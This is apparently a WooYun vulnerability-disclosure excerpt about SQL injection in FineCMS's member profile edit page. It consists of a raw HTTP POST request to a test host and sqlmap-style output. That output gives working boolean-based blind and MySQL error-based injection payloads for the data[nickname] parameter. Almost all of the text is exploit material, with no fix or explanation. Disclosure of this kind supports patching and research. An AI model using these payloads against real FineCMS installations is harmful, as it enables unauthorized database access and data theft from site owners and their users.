WooYun.org

代码区：
POST /finecms/index.php?s=member&c=info&a=edit HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.test.com/finecms/index.php?s=member&c=info&a=edit
Cookie: finecms_b1bf4_member_id=3; finecms_b1bf4_member_code=3382b20ba7587cfe0044; finecms_b1bf4_ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2272eee757a167904d1776a6ac44b4a55f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.2%3B+WOW64%3B+rv%3A18.0%29+Gecko%2F20100101+Firefox%2F18.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435919779%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dc3b3ae032296e75fc6cd251bd380af58f0f65efa
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
data%5Bnickname%5D=sec&data%5Bxingming%5D=he1&submit=%E4%BF%9D+%E5%AD%98

Place: POST
Parameter: data[nickname]
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus
e (RLIKE)
    Payload: data[nickname]=sec' RLIKE (SELECT (CASE WHEN (2742=2742) THEN 0x736
563 ELSE 0x28 END)) AND 'wBOG'='wBOG&data[xingming]=fei&submit=%E4%BF%9D %E5%AD%
98
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: data[nickname]=sec' AND (SELECT 8922 FROM(SELECT COUNT(*),CONCAT(0x
7169757571,(SELECT (CASE WHEN (8922=8922) THEN 1 ELSE 0 END)),0x71716e7671,FLOOR
(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zLen'='z
Len&data[xingming]=fei&submit=%E4%BF%9D %E5%AD%98